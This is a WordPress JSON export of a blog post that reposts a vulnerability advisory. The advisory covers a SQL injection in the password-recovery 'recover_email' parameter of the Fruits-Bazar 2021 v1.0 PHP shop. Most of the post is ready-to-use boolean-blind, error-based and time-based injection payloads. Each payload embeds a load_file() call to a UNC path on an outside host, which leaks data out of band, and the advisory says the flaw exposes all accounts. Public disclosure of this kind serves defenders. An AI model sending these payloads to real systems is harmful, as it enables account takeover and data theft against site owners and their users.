{"id":26341,"date":"2022-06-30T00:39:34","date_gmt":"2022-06-29T20:39:34","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167617\/fruitsbazar202110-sql.txt"},"modified":"2022-07-04T12:59:08","modified_gmt":"2022-07-04T08:29:08","slug":"fruits-bazar-2021-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/fruits-bazar-2021-1-0-sql-injection\/","title":{"rendered":"Fruits-Bazar 2021 1.0 SQL Injection"},"content":{"rendered":"<p dir=\"ltr\">## Title: Fruits-Bazar 2021 v1.0 SQLi<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 06.29.2022<br \/>\n## Vendor: https:\/\/github.com\/creativesaiful<br \/>\n## Software: https:\/\/github.com\/creativesaiful\/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-<br \/>\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/Md-Saiful-Islam-creativesaiful\/2021\/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar<\/p>\n<p dir=\"ltr\">## Description:<br \/>\nThe recover_email parameter appears to be vulnerable to SQL injection attacks.<br \/>\nThe attacker can take access to all accounts on this system.<br \/>\nStatus: CRITICAL<\/p>\n<p dir=\"ltr\">[+] Payloads:<\/p>\n<p dir=\"ltr\">&#8220;`mysql<br \/>\n&#8212;<br \/>\nParameter: recover_email (POST)<br \/>\nType: boolean-based blind<br \/>\nTitle: OR boolean-based blind &#8211; WHERE or HAVING clause (NOT)<br \/>\nPayload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net&#8217;+(select<br \/>\nload_file(&#8216;\\\\\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\\\olg&#8217;))+&#8221;<br \/>\nOR NOT 9177=9177 AND &#8216;HeFM&#8217;=&#8217;HeFM&amp;u_pass_recover=Recover Password<\/p>\n<p dir=\"ltr\">Type: error-based<br \/>\nTitle: MySQL &gt;= 5.0 AND error-based &#8211; WHERE, HAVING, ORDER BY or<br \/>\nGROUP BY clause (FLOOR)<br \/>\nPayload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net&#8217;+(select<br \/>\nload_file(&#8216;\\\\\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\\\olg&#8217;))+&#8221;<br \/>\nAND (SELECT 6160 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT<br \/>\n(ELT(6160=6160,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM<br \/>\nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND<br \/>\n&#8216;Mvga&#8217;=&#8217;Mvga&amp;u_pass_recover=Recover Password<\/p>\n<p dir=\"ltr\">Type: time-based blind<br \/>\nTitle: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br \/>\nPayload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net&#8217;+(select<br \/>\nload_file(&#8216;\\\\\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\\\olg&#8217;))+&#8221;<br \/>\nAND (SELECT 4612 FROM (SELECT(SLEEP(5)))vECZ) AND<br \/>\n&#8216;qfSm&#8217;=&#8217;qfSm&amp;u_pass_recover=Recover Password<br \/>\n&#8212;<\/p>\n<p dir=\"ltr\">&#8220;`<\/p>\n<p dir=\"ltr\">## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/Md-Saiful-Islam-creativesaiful\/2021\/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar)<\/p>\n<p dir=\"ltr\">## Proof and Exploit:<br \/>\n[href](https:\/\/streamable.com\/ngodwj)<\/p>\n<p dir=\"ltr\">&#8212;<br \/>\nSystem Administrator &#8211; Infrastructure Engineer<br \/>\nPenetration Testing Engineer<br \/>\nExploit developer at https:\/\/packetstormsecurity.com\/<br \/>\nhttps:\/\/cve.mitre.org\/index.html and https:\/\/www.exploit-db.com\/<br \/>\nhome page: https:\/\/www.nu11secur1ty.com\/<br \/>\nhiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br \/>\nnu11secur1ty &lt;http:\/\/nu11secur1ty.com\/&gt;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: Fruits-Bazar 2021 v1.0 SQLi ## Author: nu11secur1ty ## Date: 06.29.2022 ## Vendor: https:\/\/github.com\/creativesaiful ## Software: https:\/\/github.com\/creativesaiful\/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar- ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/Md-Saiful-Islam-creativesaiful\/2021\/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar ## Description: The recover_email parameter appears to be vulnerable to SQL injection attacks. The attacker can take access to all accounts on this system. Status: CRITICAL [+] Payloads: &#8220;`mysql &#8212; Parameter: recover_email (POST) Type: &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-26341","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26341","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=26341"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26341\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=26341"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=26341"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=26341"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}